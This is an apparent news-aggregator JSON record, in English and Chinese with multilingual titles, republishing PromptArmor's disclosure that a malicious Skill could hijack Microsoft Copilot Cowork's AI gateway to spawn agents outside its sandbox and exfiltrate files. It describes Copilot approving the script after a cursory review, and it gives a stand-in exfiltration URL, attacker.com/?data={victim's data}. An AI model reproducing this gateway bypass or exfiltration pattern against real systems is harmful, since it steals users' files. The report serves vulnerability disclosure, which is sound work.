{"@context":"https://schema.org","@type":"NewsArticle","generatedAt":"2026-10-06T08:00:48.640Z","headline":"PromptArmor 披露 Copilot Cowork AI 网关被劫持绕过沙箱外传文件漏洞","description":"PromptArmor 披露 Microsoft Copilot Cowork 的 AI 网关可被恶意 Skill 劫持以绕过沙箱并外传文件。","url":"https://www.aioga.com/news/uqwg8g8u20023z36jy20gpfb1/","mainEntityOfPage":"https://www.aioga.com/news/uqwg8g8u20023z36jy20gpfb1/","datePublished":"2026-09-30T00:00:00.000Z","dateModified":"2026-09-30T00:00:00.000Z","inLanguage":"zh-CN","publisher":{"@type":"NewsMediaOrganization","name":"Aioga","url":"https://www.aioga.com"},"citation":["https://www.promptarmor.com/resources/hijacking-copilot-coworks-ai-gateway-to-exfiltrate-files","https://aihot.news/items/uqwg8g8u20023z36jy20gpfb1"],"canonicalUrl":"https://www.aioga.com/news/uqwg8g8u20023z36jy20gpfb1/","directAnswer":{"@type":"Answer","text":"PromptArmor 披露，Copilot Cowork 的 AI 基础设施漏洞可使恶意 Skill 劫持转发至 Anthropic 的网络请求路径，在沙箱外启动具备网络工具的代理并外传文件。PromptArmor 称漏洞已于 2026 年 9 月 2 日修复。","url":"https://www.aioga.com/news/uqwg8g8u20023z36jy20gpfb1/","dateCreated":"2026-09-30T00:00:00.000Z","author":{"@type":"Organization","@id":"https://www.aioga.com/authors/aioga-editorial/#editorial-team","name":"Aioga Editorial Team","url":"https://www.aioga.com/authors/aioga-editorial/"}},"evidence":[{"@type":"CreativeWork","name":"PromptArmor：Threat Intelligence source article","url":"https://www.promptarmor.com/resources/hijacking-copilot-coworks-ai-gateway-to-exfiltrate-files","datePublished":"2026-09-30T00:00:00.000Z","provider":{"@type":"Organization","name":"PromptArmor：Threat Intelligence","url":"https://www.promptarmor.com/resources/hijacking-copilot-coworks-ai-gateway-to-exfiltrate-files"}},{"@type":"CreativeWork","name":"AIHot archive record","url":"https://aihot.news/items/uqwg8g8u20023z36jy20gpfb1","datePublished":"2026-09-30T00:00:00.000Z","provider":{"@type":"Organization","name":"AIHot","url":"https://aihot.news/items/uqwg8g8u20023z36jy20gpfb1"}}],"aggregationSource":"PromptArmor：Threat Intelligence","originalPublisher":{"name":"PromptArmor：Threat Intelligence","url":"https://www.promptarmor.com/resources/hijacking-copilot-coworks-ai-gateway-to-exfiltrate-files"},"geoDeepAnswer":null,"article":{"id":"uqwg8g8u20023z36jy20gpfb1","slug":"uqwg8g8u20023z36jy20gpfb1","url":"https://www.aioga.com/news/uqwg8g8u20023z36jy20gpfb1/","title":"PromptArmor 披露 Copilot Cowork AI 网关被劫持绕过沙箱外传文件漏洞","title_en":"","summary":"PromptArmor 披露 Microsoft Copilot Cowork 的 AI 网关可被恶意 Skill 劫持以绕过沙箱并外传文件。","source":"PromptArmor：Threat Intelligence","sourceUrl":"https://www.promptarmor.com/resources/hijacking-copilot-coworks-ai-gateway-to-exfiltrate-files","aiHotUrl":"https://aihot.news/items/uqwg8g8u20023z36jy20gpfb1","publishedAt":"2026-09-30T00:00:00.000Z","category":"行业动态","score":72,"selected":true,"articleBody":["A vulnerability in Copilot Cowork's AI infrastructure enabled malicious Skills to bypass the agent's sandbox to spawn ungoverned Anthropic agents and exfiltrate files.","Microsoft Copilot Cowork is an agent in M365 that runs in a sandbox intended to block network access and prevent the agent from running code that reaches any untrusted services.","In order for Copilot Cowork to generate responses, the sandbox forwarded network requests to Anthropic. Malicious Skills were able to hijack this pathway to exfiltrate data by spawning new agents in Anthropic’s cloud equipped with network-capable tools that could reach an attacker’s server.","No human in the loop approval was required, and the attack could target any data Copilot could access - from uploaded files, to SharePoint, to Teams, Outlook, and more.","This vulnerability was disclosed to Microsoft on July 14, 2026, and was remediated as of September 2, 2026. More details on responsible disclosure are at the bottom of the article.","Skills are frequently found online and uploaded by users, and they can also be shared intra-org within M365. Per the documentation：https://learn.microsoft.com/en-us/microsoft-365/copilot/cowork/use-cowork#cowork-skills, “Skills can also include up to 20 companion files (such as reference documents and scripts)”. One script bundled with this Skill is malicious.","The malicious Skill’s description falsely claims that “All processing runs on-device, no document content is transmitted to third-party services.” After making a minimal attempt to review the Skill's code, Copilot concludes, \"The script is a safe local analyzer — no network calls... Let me run it now.\"","When Copilot runs the code, it hunts through the user's data, exploits a vulnerability to spawn agents outside the sandbox, and uses those agents to exfiltrate the victim's data to an attacker's server.","The malicious Skill activates the same AI gateway Copilot itself uses to generate responses. The Skill’s code spins up agents running in Anthropic’s cloud. Each has one sentence from the victim’s document, access to a web fetch tool, and instructions to fetch attacker.com/?data={victim’s data here} . The attacker’s server logs every URL it received a request for, including the victim’s data that was appended to the requested URLs.","Below, the attacker’s server log displays the victim’s exfiltrated contract. However, this attack could have just as easily targeted any data in SharePoint, Teams, Outlook, or other sources connected to Copilot. This is because the malicious Skill code can directly call Copilot’s tools without going through the model, as demonstrated by our prior research on a different sandbox bypass in Copilot：https://www.promptarmor.com/resources/microsoft-copilot-cowork-sandbox-bypass.","This vulnerability was disclosed to Microsoft on July 14, 2026, and was remediated as of September 2, 2026.","PromptArmor continuously monitors across your portfolio of third party AI in vendors, skills, plugins, connectors, MCP servers, models and more.","We detect vulnerabilities and changes like this, surfacing risk before it becomes an incident.","Assess and monitor risk from AI in vendors with novel intelligence on emerging threats."],"articleImages":[{"sourceUrl":"https://www.promptarmor.com/_next/image?url=https%3A%2F%2Fcdn.sanity.io%2Fimages%2Fqbcmjtpr%2Fproduction%2Fe94c4908192a8b22b31a3c5df322c958fddc6180-4141x2301.png%3Fw%3D2048%26fm%3Dwebp%26q%3D82%26fit%3Dmax&w=3840&q=75&dpl=dpl_CwwzLAGRdwDBZc2Ns3wLmB3f3Gw3","alt":"Copilot Cowork’s AI gateway hijacked to exfiltrate the victim’s files","afterParagraph":0,"url":"/media/articles/uqwg8g8u20023z36jy20gpfb1/cb73a99d9e9ab155.avif"},{"sourceUrl":"https://www.promptarmor.com/_next/image?url=https%3A%2F%2Fcdn.sanity.io%2Fimages%2Fqbcmjtpr%2Fproduction%2F3587ed053f755baa8938c46b5f8272e05e024606-3019x1698.png%3Fw%3D2048%26fm%3Dwebp%26q%3D82%26fit%3Dmax&w=3840&q=75&dpl=dpl_CwwzLAGRdwDBZc2Ns3wLmB3f3Gw3","alt":"The victim uploads an MSA draft to Copilot Cowork","afterParagraph":4,"url":"/media/articles/uqwg8g8u20023z36jy20gpfb1/ef83855b74fa4ced.avif"},{"sourceUrl":"https://www.promptarmor.com/_next/image?url=https%3A%2F%2Fcdn.sanity.io%2Fimages%2Fqbcmjtpr%2Fproduction%2F02063f648a2938c05aad2fbf1f9b0fa755afbe59-1509x849.png&w=3840&q=75&dpl=dpl_CwwzLAGRdwDBZc2Ns3wLmB3f3Gw3","alt":"The victim invokes a contract review Skill found online","afterParagraph":5,"url":"/media/articles/uqwg8g8u20023z36jy20gpfb1/eff0fdfb8d8869f8.avif"},{"sourceUrl":"https://www.promptarmor.com/_next/image?url=https%3A%2F%2Fcdn.sanity.io%2Fimages%2Fqbcmjtpr%2Fproduction%2F5e46537c6d39489beaa012fb56eca40c0d774c7f-2951x1660.png%3Fw%3D2048%26fm%3Dwebp%26q%3D82%26fit%3Dmax&w=3840&q=75&dpl=dpl_CwwzLAGRdwDBZc2Ns3wLmB3f3Gw3","alt":"Copilot runs the Skill’s bundled code, believing it to be a safe local analyzer","afterParagraph":7,"url":"/media/articles/uqwg8g8u20023z36jy20gpfb1/7e42d1188ab80244.avif"},{"sourceUrl":"https://www.promptarmor.com/_next/image?url=https%3A%2F%2Fcdn.sanity.io%2Fimages%2Fqbcmjtpr%2Fproduction%2F8ed392532ff01a1652b56e91fa51ee16e78036c1-5120x2880.png%3Fw%3D2048%26fm%3Dwebp%26q%3D82%26fit%3Dmax&w=3840&q=75&dpl=dpl_CwwzLAGRdwDBZc2Ns3wLmB3f3Gw3","alt":"The malicious Skill activates the local AI gateway to send data to the attacker","afterParagraph":8,"url":"/media/articles/uqwg8g8u20023z36jy20gpfb1/9b312a32a1bd0a96.avif"}],"mediaStatus":"ok","articleBodyZh":["Copilot Cowork 的 AI 基础设施中的一个漏洞使恶意技能能够绕过代理的沙箱，从而生成不受控制的 Anthropic 代理并泄露文件。","Microsoft Copilot Cowork 是 M365 中的一个代理，运行在旨在阻止网络访问并防止代理执行连接任何不受信服务的代码的沙箱中。","为了让 Copilot Cowork 生成响应，沙箱会将网络请求转发到 Anthropic。恶意技能能够劫持这一通道，通过在 Anthropic 云中生成新的代理并配备能够访问攻击者服务器的网络工具来泄露数据。","无需人工审批，攻击可以针对 Copilot 能访问的任何数据——从上传的文件，到 SharePoint，再到 Teams、Outlook 等。","该漏洞于 2026 年 7 月 14 日向 Microsoft 披露，并于 2026 年 9 月 2 日得到修复。有关负责任披露的更多详情见文章底部。","技能经常在网上被发现并由用户上传，也可以在 M365 内部组织内共享。根据文档：https://learn.microsoft.com/en-us/microsoft-365/copilot/cowork/use-cowork#cowork-skills，“技能还可以包含最多 20 个附属文件（如参考文档和脚本）”。其中捆绑的一个脚本是恶意的。","恶意技能的描述虚假地声称“所有处理都在本地运行，文档内容不会传输到第三方服务。”在对技能代码进行最小化检查后，Copilot 得出结论：“该脚本是安全的本地分析器——无网络调用……让我现在运行它。”","当 Copilot 运行代码时，它会搜索用户数据，利用漏洞在沙箱外生成代理，并利用这些代理将受害者的数据泄露到攻击者服务器。","恶意技能会激活与 Copilot 本身用于生成响应的 AI 网关相同的入口。该技能的代码会在 Anthropic 的云中启动代理。每个代理会获取受害者文档中的一句话，使用网页抓取工具，并执行指令访问 attacker.com/?data={vict害者的数据}。攻击者的服务器会记录每个接收到请求的 URL，包括附加到请求 URL 的受害者数据。","下面，攻击者的服务器日志显示了受害者被盗取的合同。但是，这次攻击同样可以轻松针对 SharePoint、Teams、Outlook 或其他与 Copilot 相连的来源中的任何数据。这是因为恶意技能代码可以直接调用 Copilot 的工具，而无需通过模型，就像我们此前在 Copilot 不同沙盒绕过研究中所演示的那样：https://www.promptarmor.com/resources/microsoft-copilot-cowork-sandbox-bypass。","该漏洞已于 2026 年 7 月 14 日披露给微软，并已于 2026 年 9 月 2 日修复。","PromptArmor 持续监控您所使用的第三方 AI 供应商、技能、插件、连接器、MCP 服务器、模型等整个组合。","我们会检测此类漏洞和变化，在风险演变成事件之前将其呈现出来。","通过前沿情报评估和监控来自供应商 AI 的风险，洞察新出现的威胁。"],"translationStatus":"translated","bodyOrigin":"source-page","editorial":{"summary":"PromptArmor 披露，Copilot Cowork 的 AI 基础设施漏洞可使恶意 Skill 劫持转发至 Anthropic 的网络请求路径，在沙箱外启动具备网络工具的代理并外传文件。PromptArmor 称漏洞已于 2026 年 9 月 2 日修复。","background":"材料称，Copilot Cowork 在 M365 中运行于旨在阻止网络访问和执行可访问不可信服务代码的沙箱内；为生成回复，沙箱会将网络请求转发给 Anthropic。漏洞于 2026 年 7 月 14 日披露给 Microsoft。","viewpoint":"Aioga 判断：报道呈现的风险与 Skill 中捆绑的恶意脚本及 AI 网关请求转发路径有关。材料还称攻击无需人在环路中批准；这些描述来自 PromptArmor，不能据此推断其他产品或场景也存在相同问题。","implications":"可能影响：材料称攻击可针对 Copilot 能访问的数据，包括上传文件、SharePoint、Teams 和 Outlook 内容。组织可能需要关注 Skill 的来源与内容审查；但材料不足以说明实际受影响范围或发生过多少次攻击。","nextStep":"后续观察：可关注 Microsoft 对修复范围及相关防护措施的公开说明，并依据组织自身使用情况检查 Skill 的来源与内容。现有材料未提供修复细节，也未说明漏洞被实际利用的规模。","evidenceRefs":["title","summary","articleBody","source"],"status":"published","aiGenerated":true,"autoApproved":true,"generatedBy":"aioga-editorial:gpt-5.6-sol","reviewedBy":"aioga-editorial-review:gpt-5.6-sol","generatedAt":"2026-09-30T11:42:16.986Z","sourceHash":"80f79e9727dbb98f","review":{"approved":true,"groundedness":96,"clarity":93,"duplicationRisk":12,"blockingIssues":[],"notes":[]},"validation":{"passed":true,"mode":"ai-auto","revisions":0,"checks":["schema","length","source-attribution","editorial-labels","inference-boundary","low-source-overlap","no-html","independent-ai-review"]}},"tags":["行业动态","PromptArmor：Threat Intelligence"],"translations":{"zh-CN":{"title":"PromptArmor 披露 Copilot Cowork AI 网关被劫持绕过沙箱外传文件漏洞","summary":"PromptArmor 披露 Microsoft Copilot Cowork 的 AI 网关可被恶意 Skill 劫持以绕过沙箱并外传文件。","category":"行业动态","source":"PromptArmor：Threat Intelligence","aggregationSource":"PromptArmor：Threat Intelligence","pageTitle":"PromptArmor 披露 Copilot Cowork AI 网关被劫持绕过沙箱外传文件漏洞 - Aioga AI资讯","description":"PromptArmor 披露 Microsoft Copilot Cowork 的 AI 网关可被恶意 Skill 劫持以绕过沙箱并外传文件。","url":"https://www.aioga.com/news/uqwg8g8u20023z36jy20gpfb1/","articleBody":["Copilot Cowork 的 AI 基础设施中的一个漏洞使恶意技能能够绕过代理的沙箱，从而生成不受控制的 Anthropic 代理并泄露文件。","Microsoft Copilot Cowork 是 M365 中的一个代理，运行在旨在阻止网络访问并防止代理执行连接任何不受信服务的代码的沙箱中。","为了让 Copilot Cowork 生成响应，沙箱会将网络请求转发到 Anthropic。恶意技能能够劫持这一通道，通过在 Anthropic 云中生成新的代理并配备能够访问攻击者服务器的网络工具来泄露数据。","无需人工审批，攻击可以针对 Copilot 能访问的任何数据——从上传的文件，到 SharePoint，再到 Teams、Outlook 等。","该漏洞于 2026 年 7 月 14 日向 Microsoft 披露，并于 2026 年 9 月 2 日得到修复。有关负责任披露的更多详情见文章底部。","技能经常在网上被发现并由用户上传，也可以在 M365 内部组织内共享。根据文档：https://learn.microsoft.com/en-us/microsoft-365/copilot/cowork/use-cowork#cowork-skills，“技能还可以包含最多 20 个附属文件（如参考文档和脚本）”。其中捆绑的一个脚本是恶意的。","恶意技能的描述虚假地声称“所有处理都在本地运行，文档内容不会传输到第三方服务。”在对技能代码进行最小化检查后，Copilot 得出结论：“该脚本是安全的本地分析器——无网络调用……让我现在运行它。”","当 Copilot 运行代码时，它会搜索用户数据，利用漏洞在沙箱外生成代理，并利用这些代理将受害者的数据泄露到攻击者服务器。","恶意技能会激活与 Copilot 本身用于生成响应的 AI 网关相同的入口。该技能的代码会在 Anthropic 的云中启动代理。每个代理会获取受害者文档中的一句话，使用网页抓取工具，并执行指令访问 attacker.com/?data={vict害者的数据}。攻击者的服务器会记录每个接收到请求的 URL，包括附加到请求 URL 的受害者数据。","下面，攻击者的服务器日志显示了受害者被盗取的合同。但是，这次攻击同样可以轻松针对 SharePoint、Teams、Outlook 或其他与 Copilot 相连的来源中的任何数据。这是因为恶意技能代码可以直接调用 Copilot 的工具，而无需通过模型，就像我们此前在 Copilot 不同沙盒绕过研究中所演示的那样：https://www.promptarmor.com/resources/microsoft-copilot-cowork-sandbox-bypass。","该漏洞已于 2026 年 7 月 14 日披露给微软，并已于 2026 年 9 月 2 日修复。","PromptArmor 持续监控您所使用的第三方 AI 供应商、技能、插件、连接器、MCP 服务器、模型等整个组合。","我们会检测此类漏洞和变化，在风险演变成事件之前将其呈现出来。","通过前沿情报评估和监控来自供应商 AI 的风险，洞察新出现的威胁。"]},"en":{"title":"PromptArmor Discloses a Vulnerability in the Copilot Cowork AI Gateway That Allows It to Be Hijacked to Bypass the Sandbox and Exfiltrate Files","summary":"PromptArmor disclosed that Microsoft Copilot Cowork’s AI gateway can be hijacked by a malicious Skill to bypass the sandbox and exfiltrate files.","category":"Industry","source":"PromptArmor：Threat Intelligence","aggregationSource":"PromptArmor：Threat Intelligence","pageTitle":"PromptArmor Discloses a Vulnerability in the Copilot Cowork AI Gateway That Allows It to Be Hijacked to Bypass the Sandbox and Exfiltrate Files - Aioga AI News","description":"PromptArmor disclosed that Microsoft Copilot Cowork’s AI gateway can be hijacked by a malicious Skill to bypass the sandbox and exfiltrate files.","url":"https://www.aioga.com/en/news/uqwg8g8u20023z36jy20gpfb1/","contentTranslated":true,"translationStatus":"translated","translationRetryAt":"","translationError":"","sourceHash":"969934473bd5c549","translatedAt":"2026-09-30T11:06:44.250Z"},"ja":{"title":"PromptArmor、Copilot Cowork AIゲートウェイが乗っ取られ、サンドボックスを回避してファイルを外部送信できる脆弱性を公表","summary":"PromptArmor は、Microsoft Copilot Cowork の AI ゲートウェイが悪意のあるスキルによって乗っ取られ、サンドボックスを回避してファイルを外部に送信される可能性があることを明らかにした。","category":"業界動向","source":"PromptArmor：Threat Intelligence","aggregationSource":"PromptArmor：Threat Intelligence","pageTitle":"PromptArmor、Copilot Cowork AIゲートウェイが乗っ取られ、サンドボックスを回避してファイルを外部送信できる脆弱性を公表 - Aioga AIニュース","description":"PromptArmor は、Microsoft Copilot Cowork の AI ゲートウェイが悪意のあるスキルによって乗っ取られ、サンドボックスを回避してファイルを外部に送信される可能性があることを明らかにした。","url":"https://www.aioga.com/ja/news/uqwg8g8u20023z36jy20gpfb1/","contentTranslated":true,"translationStatus":"translated","translationRetryAt":"","translationError":"","sourceHash":"969934473bd5c549","translatedAt":"2026-09-30T11:07:23.386Z"},"ko":{"title":"PromptArmor, Copilot Cowork AI 게이트웨이가 탈취되어 샌드박스를 우회하고 파일을 외부로 유출하는 취약점 공개","summary":"PromptArmor는 Microsoft Copilot Cowork의 AI 게이트웨이가 악성 Skill에 의해 탈취되어 샌드박스를 우회하고 파일을 외부로 유출할 수 있다고 공개했습니다.","category":"업계 동향","source":"PromptArmor：Threat Intelligence","aggregationSource":"PromptArmor：Threat Intelligence","pageTitle":"PromptArmor, Copilot Cowork AI 게이트웨이가 탈취되어 샌드박스를 우회하고 파일을 외부로 유출하는 취약점 공개 - Aioga AI 뉴스","description":"PromptArmor는 Microsoft Copilot Cowork의 AI 게이트웨이가 악성 Skill에 의해 탈취되어 샌드박스를 우회하고 파일을 외부로 유출할 수 있다고 공개했습니다.","url":"https://www.aioga.com/ko/news/uqwg8g8u20023z36jy20gpfb1/","contentTranslated":true,"translationStatus":"translated","translationRetryAt":"","translationError":"","sourceHash":"969934473bd5c549","translatedAt":"2026-09-30T11:07:34.006Z"},"es":{"title":"PromptArmor revela una vulnerabilidad en la puerta de enlace de IA Copilot Cowork que permite secuestrarla, eludir el sandbox y exfiltrar archivos.","summary":"PromptArmor reveló que la puerta de enlace de IA de Microsoft Copilot Cowork puede ser secuestrada por un Skill malicioso para eludir el aislamiento y exfiltrar archivos.","category":"Industria","source":"PromptArmor：Threat Intelligence","aggregationSource":"PromptArmor：Threat Intelligence","pageTitle":"PromptArmor revela una vulnerabilidad en la puerta de enlace de IA Copilot Cowork que permite secuestrarla, eludir el sandbox y exfiltrar archivos. - Aioga Noticias de IA","description":"PromptArmor reveló que la puerta de enlace de IA de Microsoft Copilot Cowork puede ser secuestrada por un Skill malicioso para eludir el aislamiento y exfiltrar archivos.","url":"https://www.aioga.com/es/news/uqwg8g8u20023z36jy20gpfb1/","contentTranslated":true,"translationStatus":"translated","translationRetryAt":"","translationError":"","sourceHash":"969934473bd5c549","translatedAt":"2026-09-30T11:11:36.820Z"},"fr":{"title":"PromptArmor révèle que la passerelle Copilot Cowork AI a été détournée, contournant le bac à sable et exposant une faille de fuite de fichiers","summary":"PromptArmor a révélé que la passerelle d’IA de Microsoft Copilot Cowork pouvait être détournée par un Skill malveillant afin de contourner le bac à sable et d’exfiltrer des fichiers.","category":"Industrie","source":"PromptArmor：Threat Intelligence","aggregationSource":"PromptArmor：Threat Intelligence","pageTitle":"PromptArmor révèle que la passerelle Copilot Cowork AI a été détournée, contournant le bac à sable et exposant une faille de fuite de fichiers - Aioga Actualités IA","description":"PromptArmor a révélé que la passerelle d’IA de Microsoft Copilot Cowork pouvait être détournée par un Skill malveillant afin de contourner le bac à sable et d’exfiltrer des fichier...","url":"https://www.aioga.com/fr/news/uqwg8g8u20023z36jy20gpfb1/","contentTranslated":true,"translationStatus":"translated","translationRetryAt":"","translationError":"","sourceHash":"969934473bd5c549","translatedAt":"2026-09-30T11:12:28.901Z"},"de":{"title":"PromptArmor hat eine Schwachstelle im Copilot Cowork AI-Gateway offengelegt, die eine Übernahme, die Umgehung der Sandbox und die Exfiltration von Dateien ermöglicht.","summary":"PromptArmor enthüllt, dass das AI-Gateway von Microsoft Copilot Cowork durch einen bösartigen Skill gekapert werden kann, um die Sandbox zu umgehen und Dateien zu exfiltrieren.","category":"行业动态","source":"PromptArmor：Threat Intelligence","aggregationSource":"PromptArmor：Threat Intelligence","pageTitle":"PromptArmor hat eine Schwachstelle im Copilot Cowork AI-Gateway offengelegt, die eine Übernahme, die Umgehung der Sandbox und die Exfiltration von Dateien ermöglicht. - Aioga KI-News","description":"PromptArmor enthüllt, dass das AI-Gateway von Microsoft Copilot Cowork durch einen bösartigen Skill gekapert werden kann, um die Sandbox zu umgehen und Dateien zu exfiltrieren.","url":"https://www.aioga.com/de/news/uqwg8g8u20023z36jy20gpfb1/","contentTranslated":true,"translationStatus":"translated","translationRetryAt":"","translationError":"","sourceHash":"969934473bd5c549","translatedAt":"2026-09-30T11:12:07.775Z"},"pt-BR":{"title":"PromptArmor divulga vulnerabilidade no Copilot Cowork que permite sequestrar o gateway de IA, contornar o sandbox e exfiltrar arquivos","summary":"A PromptArmor revelou que o gateway de IA do Microsoft Copilot Cowork pode ser sequestrado por Skills maliciosos para contornar o sandbox e transmitir arquivos.","category":"行业动态","source":"PromptArmor：Threat Intelligence","aggregationSource":"PromptArmor：Threat Intelligence","pageTitle":"PromptArmor divulga vulnerabilidade no Copilot Cowork que permite sequestrar o gateway de IA, contornar o sandbox e exfiltrar arquivos - Aioga Notícias de IA","description":"A PromptArmor revelou que o gateway de IA do Microsoft Copilot Cowork pode ser sequestrado por Skills maliciosos para contornar o sandbox e transmitir arquivos.","url":"https://www.aioga.com/pt-BR/news/uqwg8g8u20023z36jy20gpfb1/","contentTranslated":true,"translationStatus":"translated","translationRetryAt":"","translationError":"","sourceHash":"969934473bd5c549","translatedAt":"2026-09-30T11:17:41.070Z"},"ru":{"title":"PromptArmor раскрывает уязвимость Copilot Cowork AI Gateway, позволяющую обходить песочницу и передавать файлы","summary":"PromptArmor раскрыла, что AI-шлюз Microsoft Copilot Cowork может быть захвачен вредоносными Skill для обхода песочницы и передачи файлов наружу.","category":"行业动态","source":"PromptArmor：Threat Intelligence","aggregationSource":"PromptArmor：Threat Intelligence","pageTitle":"PromptArmor раскрывает уязвимость Copilot Cowork AI Gateway, позволяющую обходить песочницу и передавать файлы - Aioga Новости ИИ","description":"PromptArmor раскрыла, что AI-шлюз Microsoft Copilot Cowork может быть захвачен вредоносными Skill для обхода песочницы и передачи файлов наружу.","url":"https://www.aioga.com/ru/news/uqwg8g8u20023z36jy20gpfb1/","contentTranslated":true,"translationStatus":"translated","translationRetryAt":"","translationError":"","sourceHash":"969934473bd5c549","translatedAt":"2026-09-30T11:17:45.254Z"},"ar":{"title":"كشفت PromptArmor عن ثغرة في اختطاف بوابة الذكاء الاصطناعي Copilot Cowork، تتيح تجاوز وضع الحماية وتسريب الملفات إلى خارج النظام.","summary":"كشفت PromptArmor أن بوابة الذكاء الاصطناعي الخاصة بـ Microsoft Copilot Cowork يمكن اختطافها بواسطة Skill خبيث لتجاوز وضع الحماية وتسريب الملفات إلى الخارج.","category":"行业动态","source":"PromptArmor：Threat Intelligence","aggregationSource":"PromptArmor：Threat Intelligence","pageTitle":"كشفت PromptArmor عن ثغرة في اختطاف بوابة الذكاء الاصطناعي Copilot Cowork، تتيح تجاوز وضع الحماية وتسريب الملفات إلى خارج النظام. - Aioga أخبار الذكاء الاصطناعي","description":"كشفت PromptArmor أن بوابة الذكاء الاصطناعي الخاصة بـ Microsoft Copilot Cowork يمكن اختطافها بواسطة Skill خبيث لتجاوز وضع الحماية وتسريب الملفات إلى الخارج.","url":"https://www.aioga.com/ar/news/uqwg8g8u20023z36jy20gpfb1/","contentTranslated":true,"translationStatus":"translated","translationRetryAt":"","translationError":"","sourceHash":"969934473bd5c549","translatedAt":"2026-09-30T11:17:43.812Z"},"hi":{"title":"PromptArmor ने Copilot Cowork AI गेटवे के अपहरण और सैंडबॉक्स को बायपास करके फ़ाइल लीक की भेद्यता का खुलासा किया","summary":"PromptArmor ने खुलासा किया कि Microsoft Copilot Cowork का AI गेटवे दुर्भावनापूर्ण Skill द्वारा कब्जा किया जा सकता है ताकि सैंडबॉक्स को बायपास किया जा सके और फ़ाइलें बाहर भेजी जा सकें।","category":"行业动态","source":"PromptArmor：Threat Intelligence","aggregationSource":"PromptArmor：Threat Intelligence","pageTitle":"PromptArmor ने Copilot Cowork AI गेटवे के अपहरण और सैंडबॉक्स को बायपास करके फ़ाइल लीक की भेद्यता का खुलासा किया - Aioga AI समाचार","description":"PromptArmor ने खुलासा किया कि Microsoft Copilot Cowork का AI गेटवे दुर्भावनापूर्ण Skill द्वारा कब्जा किया जा सकता है ताकि सैंडबॉक्स को बायपास किया जा सके और फ़ाइलें बाहर भेजी जा सक...","url":"https://www.aioga.com/hi/news/uqwg8g8u20023z36jy20gpfb1/","contentTranslated":true,"translationStatus":"translated","translationRetryAt":"","translationError":"","sourceHash":"969934473bd5c549","translatedAt":"2026-09-30T11:23:23.368Z"},"it":{"title":"PromptArmor rivela una vulnerabilità che consente di dirottare il gateway AI Copilot Cowork, aggirare la sandbox ed esfiltrare file","summary":"PromptArmor ha rivelato che il gateway AI di Microsoft Copilot Cowork può essere dirottato da Skill dannose per aggirare la sandbox ed esfiltrare file.","category":"行业动态","source":"PromptArmor：Threat Intelligence","aggregationSource":"PromptArmor：Threat Intelligence","pageTitle":"PromptArmor rivela una vulnerabilità che consente di dirottare il gateway AI Copilot Cowork, aggirare la sandbox ed esfiltrare file - Aioga Notizie IA","description":"PromptArmor ha rivelato che il gateway AI di Microsoft Copilot Cowork può essere dirottato da Skill dannose per aggirare la sandbox ed esfiltrare file.","url":"https://www.aioga.com/it/news/uqwg8g8u20023z36jy20gpfb1/","contentTranslated":true,"translationStatus":"translated","translationRetryAt":"","translationError":"","sourceHash":"969934473bd5c549","translatedAt":"2026-09-30T11:23:16.082Z"},"nl":{"title":"PromptArmor onthult een kwetsbaarheid waarbij de Copilot Cowork AI-gateway kan worden gekaapt om de sandbox te omzeilen en bestanden te exfiltreren","summary":"PromptArmor heeft onthuld dat de AI-gateway van Microsoft Copilot Cowork kan worden gekaapt door een kwaadaardige Skill om de sandbox te omzeilen en bestanden naar buiten te smokkelen.","category":"行业动态","source":"PromptArmor：Threat Intelligence","aggregationSource":"PromptArmor：Threat Intelligence","pageTitle":"PromptArmor onthult een kwetsbaarheid waarbij de Copilot Cowork AI-gateway kan worden gekaapt om de sandbox te omzeilen en bestanden te exfiltreren - Aioga AI-nieuws","description":"PromptArmor heeft onthuld dat de AI-gateway van Microsoft Copilot Cowork kan worden gekaapt door een kwaadaardige Skill om de sandbox te omzeilen en bestanden naar buiten te smokke...","url":"https://www.aioga.com/nl/news/uqwg8g8u20023z36jy20gpfb1/","contentTranslated":true,"translationStatus":"translated","translationRetryAt":"","translationError":"","sourceHash":"969934473bd5c549","translatedAt":"2026-09-30T11:23:13.650Z"},"tr":{"title":"PromptArmor, Copilot Cowork AI ağ geçidinin ele geçirilerek sandbox dışına dosya sızdırma açığını ortaya çıkardı","summary":"PromptArmor, Microsoft Copilot Cowork'un AI geçidinin kötü niyetli Skill tarafından kaçırılabileceğini, böylece sanal kutuyu atlayıp dosya sızdırabileceğini açıkladı.","category":"行业动态","source":"PromptArmor：Threat Intelligence","aggregationSource":"PromptArmor：Threat Intelligence","pageTitle":"PromptArmor, Copilot Cowork AI ağ geçidinin ele geçirilerek sandbox dışına dosya sızdırma açığını ortaya çıkardı - Aioga AI Haberleri","description":"PromptArmor, Microsoft Copilot Cowork'un AI geçidinin kötü niyetli Skill tarafından kaçırılabileceğini, böylece sanal kutuyu atlayıp dosya sızdırabileceğini açıkladı.","url":"https://www.aioga.com/tr/news/uqwg8g8u20023z36jy20gpfb1/","contentTranslated":true,"translationStatus":"translated","translationRetryAt":"","translationError":"","sourceHash":"969934473bd5c549","translatedAt":"2026-09-30T11:28:10.390Z"},"vi":{"title":"PromptArmor tiết lộ lỗ hổng cho phép chiếm quyền cổng AI Copilot Cowork, vượt qua sandbox và truyền tệp ra ngoài","summary":"PromptArmor tiết lộ rằng cổng AI của Microsoft Copilot Cowork có thể bị Skill độc hại chiếm quyền để vượt qua sandbox và truyền tệp ra ngoài.","category":"行业动态","source":"PromptArmor：Threat Intelligence","aggregationSource":"PromptArmor：Threat Intelligence","pageTitle":"PromptArmor tiết lộ lỗ hổng cho phép chiếm quyền cổng AI Copilot Cowork, vượt qua sandbox và truyền tệp ra ngoài - Tin tức AI Aioga","description":"PromptArmor tiết lộ rằng cổng AI của Microsoft Copilot Cowork có thể bị Skill độc hại chiếm quyền để vượt qua sandbox và truyền tệp ra ngoài.","url":"https://www.aioga.com/vi/news/uqwg8g8u20023z36jy20gpfb1/","contentTranslated":true,"translationStatus":"translated","translationRetryAt":"","translationError":"","sourceHash":"969934473bd5c549","translatedAt":"2026-09-30T11:28:27.780Z"},"id":{"title":"PromptArmor mengungkapkan bahwa Copilot Cowork AI Gateway dibajak untuk melewati sandbox dan mengekspor file","summary":"PromptArmor mengungkapkan bahwa gateway AI Microsoft Copilot Cowork dapat dibajak oleh Skill berbahaya untuk melewati sandbox dan mengekfiltrasi file.","category":"行业动态","source":"PromptArmor：Threat Intelligence","aggregationSource":"PromptArmor：Threat Intelligence","pageTitle":"PromptArmor mengungkapkan bahwa Copilot Cowork AI Gateway dibajak untuk melewati sandbox dan mengekspor file - Berita AI Aioga","description":"PromptArmor mengungkapkan bahwa gateway AI Microsoft Copilot Cowork dapat dibajak oleh Skill berbahaya untuk melewati sandbox dan mengekfiltrasi 